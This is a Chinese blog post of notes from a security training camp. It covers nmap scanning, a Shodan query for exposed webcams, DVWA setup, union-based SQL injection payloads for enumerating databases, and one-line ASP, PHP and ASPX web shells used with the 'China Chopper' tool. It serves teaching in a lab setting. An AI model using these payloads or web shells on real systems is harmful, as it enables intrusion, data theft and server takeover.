蓝盾实训营day1——配置渗透环境和SQL注入

蓝盾实训营day1——配置渗透环境和SQL注入

有幸参加了蓝盾在学校办的10天的实训营,把过程笔记发到这里,希望可以分享给更多的人。

黑客是如何入侵的

  • 踩点
    • whois
  • 扫描
    • nmap
  • 提权
  • 破坏
  • 后门

搜索网络设备

shodan.io

远程摄像头……
搜索jaws/1.0 country:”CN”

windows服务器

  • 不开源
  • 收费

nmap命令

  • nmap -sn 10.21.31.0/24 //扫描局域网
  • nmap -O 10.21.31.0 //扫描单台主机
  • Metasploit 集成漏洞攻击工具

DVMA

渗透测试用的环境

配置

蓝盾实训营day1——配置渗透环境和SQL注入_第1张图片
编辑config/config.inc.php.dist:
蓝盾实训营day1——配置渗透环境和SQL注入_第2张图片
配置好数据库账号跟密码。
最后把config.inc.php.dist的后缀.dist删掉。

把DVWA-master整个文件夹放入phpstudy下的WWW目录下完成部署。

SQL注入

  • 普通的注入网页有信息返回和显示
  • SQL盲注没有任何信息返回
  • 输入特殊字符,如’,看看是否返回错误信息

注入类型

数字型

select * from table where id=123

测试:
- 1 and 1=1
- 1 and 1=2

字符型

select * from table where id=’123’

测试
- 1’ and 1=1 #
- 1’ and 1=2 #

查询额外数据

通过 order by 判断该表有多少字段

order by 1

order by 2

测试一下

’ or 1=1 union select ‘2’,’3’ #

//如果界面有显示出2和3则表示注入成功

通过database()、version()查询当前数据库名称和版本

’ or 1=2 union select database(),version() #

查表名
' or 1=2 union select table_name,2 from information_schema.tables where table_schema='dvwa' #
查列名
' or 1=2 union select column_name,2 from information_schema.columns where table_name='user' #

php转义防御

mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。下列字符受影响:

\x00
\n
\r
\
'
"
\x1a
如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。

逆向md5

查表:cmd5.com

文件上传漏洞

特征

  • 文件上传没有过滤
  • 文件上传之后可以通过网站url访问该文件

上传木马文件

这种文件称为“一句话木马”;不同服务器语言的一句话木马可以通过百度获得。

asp一句话木马:
   <%eval(request("value"))%>
php一句话木马:
    @eval($_POST[value]);?>
aspx一句话木马:
  <%@ Page Language="Jscript"%>
  <%eval(Request.Item["value"])%>

value是这个木马的key,把文件在网站中的url和key记录下来,用木马利用工具,比如“中国菜刀”,提供url和key就可以遍历服务器的目录了。

你可能感兴趣的:(网络安全,蓝盾十天网络攻防实训营记录)